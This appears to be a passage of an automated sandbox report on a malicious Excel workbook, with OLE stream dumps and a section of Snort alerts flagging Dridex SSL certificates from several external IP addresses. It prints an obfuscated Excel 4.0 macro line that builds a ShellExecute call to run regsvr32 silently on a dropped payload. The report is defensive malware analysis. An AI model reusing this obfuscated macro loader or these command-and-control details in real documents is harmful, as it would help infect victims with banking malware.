Data ASCII:	. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/f, File Type: data, Stream Size: 178

General
Stream Path:	MBD00102510/f
File Type:	data
Stream Size:	178
Entropy:	2.56223021678
Base64 Encoded:	False
Data ASCII:	. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . . . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 . . . . . . . . . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 . . . 5 . . . . . . . . . . . . . . . T . . .
Data Raw:	00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 00 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/i02/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	MBD00102510/i02/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/i02/f, File Type: data, Stream Size: 40

General
Stream Path:	MBD00102510/i02/f
File Type:	data
Stream Size:	40
Entropy:	1.54176014818
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/i02/o, File Type: empty, Stream Size: 0

General
Stream Path:	MBD00102510/i02/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: MBD00102510/i03/\x1CompObj, File Type: data, Stream Size: 110

General
Stream Path:	MBD00102510/i03/\x1CompObj
File Type:	data
Stream Size:	110
Entropy:	4.63372611993
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/i03/f, File Type: data, Stream Size: 40

General
Stream Path:	MBD00102510/i03/f
File Type:	data
Stream Size:	40
Entropy:	1.90677964945
Base64 Encoded:	False
Data ASCII:	. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD00102510/i03/o, File Type: empty, Stream Size: 0

General
Stream Path:	MBD00102510/i03/o
File Type:	empty
Stream Size:	0
Entropy:	0.0
Base64 Encoded:	False
Data ASCII:
Data Raw:

Stream Path: MBD00102510/o, File Type: data, Stream Size: 152

General
Stream Path:	MBD00102510/o
File Type:	data
Stream Size:	152
Entropy:	2.68720470607
Base64 Encoded:	False
Data ASCII:	. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . . . . . . P a g e 2 . . . . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
Data Raw:	00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 84 00 00 00 84 00 00 00 05 00 00 80 50 61 67 65 31 00 00 00 05 00 00 80 50 61 67 65 32 00 00 00 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80

Stream Path: MBD00102510/x, File Type: data, Stream Size: 48

General
Stream Path:	MBD00102510/x
File Type:	data
Stream Size:	48
Entropy:	1.42267983198
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 55702

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	55702
Entropy:	5.35171514759
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . C . % 8 . . . . . . . X
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 550

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	550
Entropy:	5.28107922141
Base64 Encoded:	True
Data ASCII:	I D = " { 4 9 3 4 E D C 8 - 1 B 9 3 - 4 5 B C - B 6 9 0 - D B B 2 9 D 5 C 1 4 7 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E E E C 1 D 3 1 E 5 F 1 D 7 F 5 D 7 F 5 D 7 F 5 D 7 F 5 " . . D P B = " D C D E 2 F 3 F F 3 2 C F 4 2 C F 4 2 C "
Data Raw:	49 44 3d 22 7b 34 39 33 34 45 44 43 38 2d 31 42 39 33 2d 34 35 42 43 2d 42 36 39 30 2d 44 42 42 32 39 44 35 43 31 34 37 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 4e 61 6d 65 3d

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
File Type:	data
Stream Size:	86
Entropy:	3.24455457963
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 3574

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	3574
Entropy:	4.45079869926
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
Data Raw:	cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 2060

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_0
File Type:	data
Stream Size:	2060
Entropy:	3.45011283232
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ X . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . Y . n . M . . . W . . v _ . . . . . . . .
Data Raw:	93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 187

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_1
File Type:	data
Stream Size:	187
Entropy:	1.91493173134
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w q . . . . . . . . . . . . . . . . n i m o . . . . . . . . . . . . . . . . y e l ^ . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 02 00 00 00 00 00 00 08 02 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 363

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_2
File Type:	data
Stream Size:	363
Entropy:	2.21122978445
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 398

General
Stream Path:	_VBA_PROJECT_CUR/VBA/__SRP_3
File Type:	data
Stream Size:	398
Entropy:	2.07709195049
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 820

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
File Type:	data
Stream Size:	820
Entropy:	6.49145935167
Base64 Encoded:	True
Data ASCII:	. 0 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 30 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 09 a2 eb 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Macro 4.0 Code

CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab&ba, 0, 0)

"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab&ba,0,0)"=RETURN()

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/12/21-07:39:50.885082	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49166	77.220.64.37	192.168.2.22
01/12/21-07:39:54.260102	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49168	80.86.91.27	192.168.2.22
01/12/21-07:39:54.832983	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49169	5.100.228.233	192.168.2.22
01/12/21-07:39:54.832983	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49169	5.100.228.233	192.168.2.22
01/12/21-07:39:55.937339	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49171	77.220.64.37	192.168.2.22
01/12/21-07:39:56.456760	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49172	80.86.91.27	192.168.2.22
01/12/21-07:39:56.959729	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49173	5.100.228.233	192.168.2.22
01/12/21-07:39:56.959729	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49173	5.100.228.233	192.168.2.22
01/12/21-07:39:57.985172	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49175	77.220.64.37	192.168.2.22
01/12/21-07:39:58.507888	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49176	80.86.91.27	192.168.2.22
01/12/21-07:39:59.021977	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49177	5.100.228.233	192.168.2.22
01/12/21-07:39:59.021977	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49177	5.100.228.233	192.168.2.22
01/12/21-07:40:00.063389	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49179	77.220.64.37	192.168.2.22
01/12/21-07:40:00.568408	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49180	80.86.91.27	192.168.2.22
01/12/21-07:40:01.077106	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49181	5.100.228.233	192.168.2.22
01/12/21-07:40:01.077106	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49181	5.100.228.233	192.168.2.22
01/12/21-07:40:02.122035	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49183	77.220.64.37	192.168.2.22
01/12/21-07:40:02.638255	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49184	80.86.91.27	192.168.2.22
01/12/21-07:40:03.167707	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49185	5.100.228.233	192.168.2.22
01/12/21-07:40:03.167707	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49185	5.100.228.233	192.168.2.22
01/12/21-07:40:04.216497	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49187	77.220.64.37	192.168.2.22
01/12/21-07:40:04.735032	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49188	80.86.91.27	192.168.2.22
01/12/21-07:40:05.252447	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49189	5.100.228.233	192.168.2.22
01/12/21-07:40:05.252447	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49189	5.100.228.233	192.168.2.22
01/12/21-07:40:06.290814	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49191	77.220.64.37	192.168.2.22
01/12/21-07:40:06.806955	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49192	80.86.91.27	192.168.2.22
01/12/21-07:40:07.313185	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49193	5.100.228.233	192.168.2.22
01/12/21-07:40:07.313185	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49193	5.100.228.233	192.168.2.22
01/12/21-07:40:08.344389	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49195	77.220.64.37	192.168.2.22
01/12/21-07:40:08.889039	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49196	80.86.91.27	192.168.2.22
01/12/21-07:40:09.564984	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49197	5.100.228.233	192.168.2.22
01/12/21-07:40:09.564984	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49197	5.100.228.233	192.168.2.22
01/12/21-07:40:11.713544	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49199	77.220.64.37	192.168.2.22
01/12/21-07:40:12.225540	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49200	80.86.91.27	192.168.2.22
01/12/21-07:40:12.731816	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49201	5.100.228.233	192.168.2.22
01/12/21-07:40:12.731816	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49201	5.100.228.233	192.168.2.22
01/12/21-07:40:13.772564	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49203	77.220.64.37	192.168.2.22
01/12/21-07:40:14.296498	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49204	80.86.91.27	192.168.2.22
01/12/21-07:40:14.799192	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49205	5.100.228.233	192.168.2.22
01/12/21-07:40:14.799192	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49205	5.100.228.233	192.168.2.22
01/12/21-07:40:15.832708	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49207	77.220.64.37	192.168.2.22
01/12/21-07:40:16.342420	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49208	80.86.91.27	192.168.2.22
01/12/21-07:40:16.857184	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49209	5.100.228.233	192.168.2.22
01/12/21-07:40:16.857184	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49209	5.100.228.233	192.168.2.22
01/12/21-07:40:17.058584	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49210	5.100.228.233	192.168.2.22
01/12/21-07:40:17.058584	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49210	5.100.228.233	192.168.2.22
01/12/21-07:40:18.097916	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49212	77.220.64.37	192.168.2.22
01/12/21-07:40:18.603747	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49213	80.86.91.27	192.168.2.22
01/12/21-07:40:19.114602	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49214	5.100.228.233	192.168.2.22
01/12/21-07:40:19.114602	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49214	5.100.228.233	192.168.2.22
01/12/21-07:40:20.146485	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49216	77.220.64.37	192.168.2.22
01/12/21-07:40:20.671722	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49217	80.86.91.27	192.168.2.22
01/12/21-07:40:21.196019	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49218	5.100.228.233	192.168.2.22
01/12/21-07:40:21.196019	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49218	5.100.228.233	192.168.2.22
01/12/21-07:40:22.234646	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49220	77.220.64.37	192.168.2.22
01/12/21-07:40:22.753345	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49221	80.86.91.27	192.168.2.22
01/12/21-07:40:23.278831	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49222	5.100.228.233	192.168.2.22
01/12/21-07:40:23.278831	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49222	5.100.228.233	192.168.2.22
01/12/21-07:40:24.288884	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49224	77.220.64.37	192.168.2.22
01/12/21-07:40:24.802850	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49225	80.86.91.27	192.168.2.22
01/12/21-07:40:25.323114	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49226	5.100.228.233	192.168.2.22
01/12/21-07:40:25.323114	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49226	5.100.228.233	192.168.2.22
01/12/21-07:40:26.363502	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49228	77.220.64.37	192.168.2.22
